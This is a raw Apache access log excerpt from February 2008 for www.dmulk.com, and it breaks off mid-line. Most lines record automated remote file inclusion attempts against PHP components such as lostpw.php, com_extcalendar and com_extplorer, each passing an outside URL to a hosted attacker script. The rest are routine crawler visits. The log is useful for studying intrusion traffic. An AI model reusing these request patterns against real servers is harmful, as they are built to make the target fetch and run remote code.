202.171.48.7 - - [04/Feb/2008:06:42:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.79.168.42 - - [04/Feb/2008:06:43:56 -0800] "GET /logs/access_071225.log/index.php?body=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:06:43:57 -0800] "GET /logs/access_071229.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:06:43:57 -0800] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:06:43:58 -0800] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.44 - - [04/Feb/2008:06:44:40 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.223.100.182 - - [04/Feb/2008:06:44:50 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.232.66.107 - - [04/Feb/2008:06:45:54 -0800] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.171.48.7 - - [04/Feb/2008:06:45:57 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.251.245 - - [04/Feb/2008:06:46:03 -0800] "GET /logs/access_071224.log%20%20//modules/PNphpBB2/printview.php?phpEx=http://avvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:46:33 -0800] "GET /logs/access_080112.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
84.16.251.245 - - [04/Feb/2008:06:46:56 -0800] "GET /logs//modules/PNphpBB2/printview.php?phpEx=http://avvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:46:59 -0800] "GET /logs/access_080119.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:47:07 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:47:07 -0800] "GET //appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:47:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:47:10 -0800] "GET /logs/access_080115.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:06:47:27 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.162.52 - - [04/Feb/2008:06:47:41 -0800] "GET /logs/access_071230.log//administrator/components/com_extplorer/install.extplorer.php?mosConfig_absolute_path=http://fs-wir.de/mambots/editors/fckeditor/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.162.52 - - [04/Feb/2008:06:47:41 -0800] "GET //administrator/components/com_extplorer/install.extplorer.php?mosConfig_absolute_path=http://fs-wir.de/mambots/editors/fckeditor/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.162.52 - - [04/Feb/2008:06:47:41 -0800] "GET /logs//administrator/components/com_extplorer/install.extplorer.php?mosConfig_absolute_path=http://fs-wir.de/mambots/editors/fckeditor/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.162.52 - - [04/Feb/2008:06:47:42 -0800] "GET /logs/access_071230.log//administrator/components/com_extplorer/install.extplorer.php?mosConfig_absolute_path=http://fs-wir.de/mambots/editors/fckeditor/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.162.52 - - [04/Feb/2008:06:47:42 -0800] "GET //administrator/components/com_extplorer/install.extplorer